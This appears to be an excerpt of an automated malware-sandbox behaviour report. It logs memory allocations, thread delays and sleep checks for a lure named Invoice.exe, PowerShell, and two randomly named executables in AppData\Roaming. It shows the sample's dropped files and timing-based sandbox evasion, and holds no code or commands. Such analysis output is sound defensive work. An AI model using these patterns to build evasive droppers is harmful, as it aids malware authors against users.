Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Memory allocated: 92E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Memory allocated: 9840000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Memory allocated: 7140000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Memory allocated: 2E60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Memory allocated: 30F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Memory allocated: 2E60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 7D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 24B0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: A40000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 6FD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 7FD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 8170000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 9170000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 96E0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 6FD0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: EB0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 2BC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 4BC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 2D60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 2F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 4F00000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 7CA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 7270000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 8CA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 9CA0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: A1F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: B1F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: C1F0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 1560000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 2F60000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Memory allocated: 1560000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1199953	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1199844	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1199719	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1199610	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1199485	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1199360	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1199235	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1199110	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1198985	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1198860	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1198735	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1198610	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1198485	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1198360	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1198235	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1198110	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1197985	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1197860	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1197735	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1197610	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Thread delayed: delay time: 1197485	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199938
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199828
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199717
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199594
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199483
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199375
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199266
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199156
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1199047
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198937
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198828
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198717
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198594
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198484
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198375
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198266
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198156
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1198046
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1197922
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1197802
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1197672
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1197562
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1197453
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Thread delayed: delay time: 1197344
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199953
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199843
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199734
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199625
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199515
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199406
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199297
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199187
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199078
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198968
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198859
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198750
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198640
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198531
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198422
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198297
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198187
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198078
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197968
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197859
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197749
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197640
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197531
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197419
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197308
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197200
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199922
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199812
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199703
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199594
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199484
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199375
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199265
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199156
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1199047
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198936
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198828
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198718
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198608
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198497
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198390
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198281
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198172
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1198062
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197952
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197844
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197734
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197583
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197468
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197359
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1197061
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Thread delayed: delay time: 1196952

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4934	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5322	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Window / User API: threadDelayed 4158	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe	Window / User API: threadDelayed 5674	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Window / User API: threadDelayed 7895
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe	Window / User API: threadDelayed 1962
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Window / User API: threadDelayed 3628
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Window / User API: threadDelayed 6219
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Window / User API: threadDelayed 3465
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe	Window / User API: threadDelayed 6372

Source: C:\Users\user\Desktop\Invoice.exe TID: 6472	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208	Thread sleep count: 4934 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7392	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7208	Thread sleep count: 92 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7260	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7452	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7368	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -33204139332677172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -100000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -99875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -99752s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -99641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -99516s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -99406s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -99297s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -99188s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -99063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -98938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -98826s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -98717s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -98609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -98500s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -98374s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -98265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -98156s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -98047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -97926s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -97810s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -97684s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -97578s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -97469s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -97334s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -97218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -97110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -97000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -96891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -96766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1199953s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1199844s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1199719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1199610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1199485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1199360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1199235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1199110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1198985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1198860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1198735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1198610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1198485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1198360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1198235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1198110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1197985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1197860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1197735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1197610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Invoice.exe TID: 7680	Thread sleep time: -1197485s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7536	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -27670116110564310s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -100000s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -99890s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -99772s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -99656s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -99547s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -99437s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -99328s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -99219s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -99106s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -98984s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -98873s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -98763s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -98640s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -98526s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -98406s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -98297s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -98187s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -98078s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -97968s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -97859s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -97750s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -97640s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -97531s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -97421s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -97312s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -97203s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1199938s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1199828s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1199717s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1199594s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1199483s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1199375s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1199266s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1199156s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1199047s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1198937s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1198828s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1198717s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1198594s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1198484s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1198375s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1198266s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1198156s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1198046s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1197922s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1197802s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1197672s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1197562s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1197453s >= -30000s
Source: C:\Users\user\AppData\Roaming\kaJNzBnxbXm.exe TID: 7896	Thread sleep time: -1197344s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 7980	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep count: 35 > 30
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -32281802128991695s >= -30000s
Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exe TID: 6624	Thread sleep time: -100000s >= -30000s
